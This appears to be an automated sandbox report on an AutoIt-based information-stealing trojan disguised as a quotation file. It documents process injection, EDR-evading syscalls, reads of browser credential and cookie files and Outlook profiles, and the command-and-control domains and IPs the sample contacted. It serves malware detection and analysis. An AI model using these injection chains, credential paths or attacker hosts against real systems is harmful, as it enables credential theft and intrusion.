                Source: C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe NtQueryVolumeInformationFile: Direct from: 0x77502E4C
                Source: C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe NtDeviceIoControlFile: Direct from: 0x77502A0C
                Source: C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe NtQuerySystemInformation: Direct from: 0x775047EC
                Source: C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe NtAllocateVirtualMemory: Direct from: 0x77502B0C
                Source: C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe NtOpenSection: Direct from: 0x77502D2C
                Source: C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe NtQueryAttributesFile: Direct from: 0x77502D8C
                Source: C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe NtCreateFile: Direct from: 0x77502F0C
                Source: C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe NtProtectVirtualMemory: Direct from: 0x774F7A4E
                Source: C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe NtReadVirtualMemory: Direct from: 0x77502DAC
                Source: C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe NtOpenFile: Direct from: 0x77502CEC
                Source: C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe NtAllocateVirtualMemory: Direct from: 0x77503BBC
                Source: C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe NtQueryInformationToken: Direct from: 0x77502BCC
                Source: C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe NtSetInformationProcess: Direct from: 0x77502B7C
                Source: C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe NtMapViewOfSection: Direct from: 0x77502C3C
                Source: C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe NtAllocateVirtualMemory: Direct from: 0x77502B1C
                Source: C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe NtResumeThread: Direct from: 0x775035CC
                Source: C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe NtReadFile: Direct from: 0x775029FC
                Source: C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe NtQuerySystemInformation: Direct from: 0x77502D1C
                Source: C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe NtNotifyChangeKey: Direct from: 0x77503B4C
                Source: C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe NtWriteVirtualMemory: Direct from: 0x77502D5C
                Source: C:\Users\user\Desktop\QUOTATION#050125.exe Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Windows\SysWOW64\cmdkey.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\cmdkey.exe Section loaded: NULL target: C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe protection: read write
                Source: C:\Windows\SysWOW64\cmdkey.exe Section loaded: NULL target: C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\cmdkey.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\cmdkey.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\cmdkey.exe Thread register set: target process: 3380
                Source: C:\Windows\SysWOW64\cmdkey.exe Thread APC queued: target process: C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
                Source: C:\Users\user\Desktop\QUOTATION#050125.exe Memory written: C:\Windows\SysWOW64\svchost.exe base: CB8008
                Source: C:\Users\user\Desktop\QUOTATION#050125.exe Code function: 2_2_00121201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
                Source: C:\Users\user\Desktop\QUOTATION#050125.exe Code function: 2_2_00102BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
                Source: C:\Users\user\Desktop\QUOTATION#050125.exe Code function: 2_2_0012B226 SendInput,keybd_event
                Source: C:\Users\user\Desktop\QUOTATION#050125.exe Code function: 2_2_001422DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event
                Source: C:\Users\user\Desktop\QUOTATION#050125.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\QUOTATION#050125.exe"
                Source: C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe Process created: C:\Windows\SysWOW64\cmdkey.exe "C:\Windows\SysWOW64\cmdkey.exe"
                Source: C:\Windows\SysWOW64\cmdkey.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\QUOTATION#050125.exe Code function: 2_2_00120B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree
                Source: C:\Users\user\Desktop\QUOTATION#050125.exe Code function: 2_2_00121663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid
                Source: QUOTATION#050125.exe Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: SwDwSdNMaTt.exe, 00000005.00000000.289197192384.00000000019A0000.00000002.00000001.00040000.00000000.sdmp, SwDwSdNMaTt.exe, 00000005.00000002.293705434048.00000000019A0000.00000002.00000001.00040000.00000000.sdmp, SwDwSdNMaTt.exe, 00000007.00000000.289343740280.0000000001420000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program Manager
                Source: QUOTATION#050125.exe, SwDwSdNMaTt.exe, 00000005.00000000.289197192384.00000000019A0000.00000002.00000001.00040000.00000000.sdmp, SwDwSdNMaTt.exe, 00000005.00000002.293705434048.00000000019A0000.00000002.00000001.00040000.00000000.sdmp, SwDwSdNMaTt.exe, 00000007.00000000.289343740280.0000000001420000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
                Source: SwDwSdNMaTt.exe, 00000005.00000000.289197192384.00000000019A0000.00000002.00000001.00040000.00000000.sdmp, SwDwSdNMaTt.exe, 00000005.00000002.293705434048.00000000019A0000.00000002.00000001.00040000.00000000.sdmp, SwDwSdNMaTt.exe, 00000007.00000000.289343740280.0000000001420000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
                Source: C:\Users\user\Desktop\QUOTATION#050125.exe Code function: 2_2_000E0698 cpuid
                Source: C:\Users\user\Desktop\QUOTATION#050125.exe Code function: 2_2_00138195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW
                Source: C:\Users\user\Desktop\QUOTATION#050125.exe Code function: 2_2_0011D27A GetUserNameW
                Source: C:\Users\user\Desktop\QUOTATION#050125.exe Code function: 2_2_000FB952 GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte
                Source: C:\Users\user\Desktop\QUOTATION#050125.exe Code function: 2_2_000C42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo

                Stealing of Sensitive Information

Source: Yara match | File source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000007.00000002.293705525670.0000000000C80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.289274740765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.289276636608.0000000005200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.289276489302.0000000003BA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.292817073543.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.292817177626.0000000002F30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.293706459836.0000000004460000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\cmdkey.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\cmdkey.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\cmdkey.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\cmdkey.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\cmdkey.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\cmdkey.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\cmdkey.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\cmdkey.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\cmdkey.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
Source: QUOTATION#050125.exe | Binary or memory string: WIN_81
Source: QUOTATION#050125.exe | Binary or memory string: WIN_XP
Source: QUOTATION#050125.exe | Binary or memory string: WIN_XPe
Source: QUOTATION#050125.exe | Binary or memory string: WIN_VISTA
Source: QUOTATION#050125.exe | Binary or memory string: WIN_7
Source: QUOTATION#050125.exe | Binary or memory string: WIN_8

                Remote Access Functionality

Source: Yara match | File source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000007.00000002.293705525670.0000000000C80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.289274740765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.289276636608.0000000005200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.289276489302.0000000003BA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.292817073543.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.292817177626.0000000002F30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.293706459836.0000000004460000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\QUOTATION#050125.exe | Code function: 2_2_00141204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket
Source: C:\Users\user\Desktop\QUOTATION#050125.exe | Code function: 2_2_00141806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket
MITRE ATT&CK Matrix (one line per tactic; a number before a technique name is the count shown in the original matrix)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: 2 Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: 1 Native API; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: 1 DLL Side-Loading; 2 Valid Accounts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: 1 Exploitation for Privilege Escalation; 1 Abuse Elevation Control Mechanism; 1 DLL Side-Loading; 2 Valid Accounts; 21 Access Token Manipulation; 412 Process Injection; Startup Items; Scheduled Task/Job; At
Defense Evasion: 1 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 1 Abuse Elevation Control Mechanism; 3 Obfuscated Files or Information; 1 DLL Side-Loading; 2 Valid Accounts; 12 Virtualization/Sandbox Evasion; 21 Access Token Manipulation; 412 Process Injection
Credential Access: 1 OS Credential Dumping; 21 Input Capture; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: 2 System Time Discovery; 1 Account Discovery; 2 File and Directory Discovery; 116 System Information Discovery; 241 Security Software Discovery; 12 Virtualization/Sandbox Evasion; 3 Process Discovery; 11 Application Window Discovery; 1 System Owner/User Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: 1 Archive Collected Data; 1 Data from Local System; 1 Email Collection; 21 Input Capture; 3 Clipboard Data; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: 4 Ingress Tool Transfer; 1 Encrypted Channel; 4 Non-Application Layer Protocol; 4 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: 1 System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
Behavior Graph (ID: 1586807) | Sample: QUOTATION#050125.exe | Start date: 09/01/2025 | Architecture: WINDOWS | Score: 100

Sample-level signatures: Suricata IDS alerts for network traffic; Antivirus / Scanner detection for submitted sample; Multi AV Scanner detection for submitted file; 4 other signatures
Contacted hosts at sample level: www.furrcali.xyz; www.rpa.asia; 15 other IPs or domains (Performs DNS queries to domains with low reputation)

Process tree:
• QUOTATION#050125.exe (started): Binary is likely a compiled AutoIt script file; Found API chain indicative of sandbox detection; Writes to foreign memory regions; 2 other signatures
• svchost.exe (started by QUOTATION#050125.exe): Maps a DLL or memory area into another process
• SwDwSdNMaTt.exe (injected by svchost.exe): Found direct / indirect Syscall (likely to bypass EDR)
• cmdkey.exe (started by SwDwSdNMaTt.exe): Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
• SwDwSdNMaTt.exe (injected by cmdkey.exe): Found direct / indirect Syscall (likely to bypass EDR); contacts www.furrcali.xyz 103.106.67.112, 49865, 49867, 49868 (VOYAGERNET-AS-APVoyagerInternetLtdNZ, New Zealand); www.givvjn.info 47.83.1.90, 49837, 49838, 49839 (VODANETInternationalIP-BackboneofVodafoneDE, United States); 9 other IPs or domains
• firefox.exe (started by cmdkey.exe)

Source | Detection | Scanner | Label
QUOTATION#050125.exe | 100% | Avira | DR/AutoIt.Gen8
QUOTATION#050125.exe | 63% | ReversingLabs | Win32.Trojan.AutoitInject
QUOTATION#050125.exe | 100% | Joe Sandbox ML |
                No Antivirus matches
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkcmdkey.exe, 00000006.00000002.292819958102.00000000061F0000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000006.00000002.292818357888.0000000003B54000.00000004.10000000.00040000.00000000.sdmp, SwDwSdNMaTt.exe, 00000007.00000002.293707698132.00000000030B4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.289570074224.0000000012344000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://www70.chiro.live/SwDwSdNMaTt.exe, 00000007.00000002.293707698132.0000000003246000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://www.chiro.live/jwa9?gp=1&js=1&uuid=1736438267.0098365932&other_args=eyJ1cmkiOiAiL2p3YTkiLCAiYcmdkey.exe, 00000006.00000002.292818357888.0000000003CE6000.00000004.10000000.00040000.00000000.sdmp, cmdkey.exe, 00000006.00000002.292819958102.00000000061F0000.00000004.00000800.00020000.00000000.sdmp, SwDwSdNMaTt.exe, 00000007.00000002.293707698132.0000000003246000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://maximumgroup.co.za/cxj4/?80k=lRapCPMXgDk&amp;6B-l7F=gKtC9mpNHTkTr00JCblrl8a3AfTX/duoM8EbXMKNjcmdkey.exe, 00000006.00000002.292818357888.0000000004B08000.00000004.10000000.00040000.00000000.sdmp, SwDwSdNMaTt.exe, 00000007.00000002.293707698132.0000000004068000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://www.furrcali.xyz/k29t/?6B-l7F=mLM4NyV3Rm7LSF6x/a3vps0uRUV7zEkflC/cwX9Xx9eDQBJ7/gNt59cujgLWGeSwDwSdNMaTt.exe, 00000007.00000002.293707698132.000000000451E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://static.loopia.se/shared/images/additional-pages-hero-shape.webpcmdkey.exe, 00000006.00000002.292819958102.00000000061F0000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000006.00000002.292818357888.0000000003B54000.00000004.10000000.00040000.00000000.sdmp, SwDwSdNMaTt.exe, 00000007.00000002.293707698132.00000000030B4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.289570074224.0000000012344000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://static.loopia.se/shared/style/2022-extra-pages.csscmdkey.exe, 00000006.00000002.292819958102.00000000061F0000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000006.00000002.292818357888.0000000003B54000.00000004.10000000.00040000.00000000.sdmp, SwDwSdNMaTt.exe, 00000007.00000002.293707698132.00000000030B4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.289570074224.0000000012344000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://static.loopia.se/responsive/images/iOS-114.pngcmdkey.exe, 00000006.00000002.292818357888.0000000003B54000.00000004.10000000.00040000.00000000.sdmp, SwDwSdNMaTt.exe, 00000007.00000002.293707698132.00000000030B4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.289570074224.0000000012344000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://i.pki.goog/r1.crt0firefox.exe, 00000008.00000003.289522257897.0000026A53F98000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkcmdkey.exe, 00000006.00000002.292819958102.00000000061F0000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000006.00000002.292818357888.0000000003B54000.00000004.10000000.00040000.00000000.sdmp, SwDwSdNMaTt.exe, 00000007.00000002.293707698132.00000000030B4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.289570074224.0000000012344000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=cmdkey.exe, 00000006.00000002.292820180506.0000000007CBD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://zz.bdstatic.com/linksubmit/push.jscmdkey.exe, 00000006.00000002.292818357888.0000000004C9A000.00000004.10000000.00040000.00000000.sdmp, SwDwSdNMaTt.exe, 00000007.00000002.293707698132.00000000041FA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                        high
                                                                        http://crl.rootca1.amazontrust.com/rootca1.crl0firefox.exe, 00000008.00000003.289522257897.0000026A53F98000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://ocsp.rootca1.amazontrust.com0:firefox.exe, 00000008.00000003.289522257897.0000026A53F98000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://ogbos88vip.clickcmdkey.exe, 00000006.00000002.292818357888.00000000047E4000.00000004.10000000.00040000.00000000.sdmp, SwDwSdNMaTt.exe, 00000007.00000002.293707698132.0000000003D44000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          http://whois.loopia.com/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utcmdkey.exe, 00000006.00000002.292819958102.00000000061F0000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000006.00000002.292818357888.0000000003B54000.00000004.10000000.00040000.00000000.sdmp, SwDwSdNMaTt.exe, 00000007.00000002.293707698132.00000000030B4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.289570074224.0000000012344000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://www.ecosia.org/newtab/cmdkey.exe, 00000006.00000002.292820180506.0000000007CBD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://static.loopia.se/responsive/styles/reset.csscmdkey.exe, 00000006.00000002.292819958102.00000000061F0000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000006.00000002.292818357888.0000000003B54000.00000004.10000000.00040000.00000000.sdmp, SwDwSdNMaTt.exe, 00000007.00000002.293707698132.00000000030B4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.289570074224.0000000012344000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://www.google.com/favicon.icocmdkey.exe, 00000006.00000002.292820180506.0000000007CBD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://ac.ecosia.org/autocomplete?q=cmdkey.exe, 00000006.00000002.292820180506.0000000007CBD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://static.loopia.se/responsive/images/iOS-57.pngcmdkey.exe, 00000006.00000002.292818357888.0000000003B54000.00000004.10000000.00040000.00000000.sdmp, SwDwSdNMaTt.exe, 00000007.00000002.293707698132.00000000030B4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.289570074224.0000000012344000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                http://crt.rootca1.amazontrust.com/rootca1.cer0?firefox.exe, 00000008.00000003.289522257897.0000026A53F98000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pacmdkey.exe, 00000006.00000002.292819958102.00000000061F0000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000006.00000002.292818357888.0000000003B54000.00000004.10000000.00040000.00000000.sdmp, SwDwSdNMaTt.exe, 00000007.00000002.293707698132.00000000030B4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.289570074224.0000000012344000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pacmdkey.exe, 00000006.00000002.292819958102.00000000061F0000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000006.00000002.292818357888.0000000003B54000.00000004.10000000.00040000.00000000.sdmp, SwDwSdNMaTt.exe, 00000007.00000002.293707698132.00000000030B4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.289570074224.0000000012344000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkincmdkey.exe, 00000006.00000002.292819958102.00000000061F0000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000006.00000002.292818357888.0000000003B54000.00000004.10000000.00040000.00000000.sdmp, SwDwSdNMaTt.exe, 00000007.00000002.293707698132.00000000030B4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.289570074224.0000000012344000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=cmdkey.exe, 00000006.00000002.292820180506.0000000007CBD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://www.loopia.com/woocommerce/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pacmdkey.exe, 00000006.00000002.292819958102.00000000061F0000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000006.00000002.292818357888.0000000003B54000.00000004.10000000.00040000.00000000.sdmp, SwDwSdNMaTt.exe, 00000007.00000002.293707698132.00000000030B4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.289570074224.0000000012344000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwebcmdkey.exe, 00000006.00000002.292819958102.00000000061F0000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000006.00000002.292818357888.0000000003B54000.00000004.10000000.00040000.00000000.sdmp, SwDwSdNMaTt.exe, 00000007.00000002.293707698132.00000000030B4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.289570074224.0000000012344000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
[Contacted IPs: world map figure; legend buckets by share of contacted IPs per country: < 25%, 25% to 50%, 50% to 75%, > 75%]
IP | Domain | Country | ASN | ASN Name | Malicious
160.25.166.123 | www.rpa.asia | unknown | 17676 | GIGAINFRASoftbankBBCorpJP | true
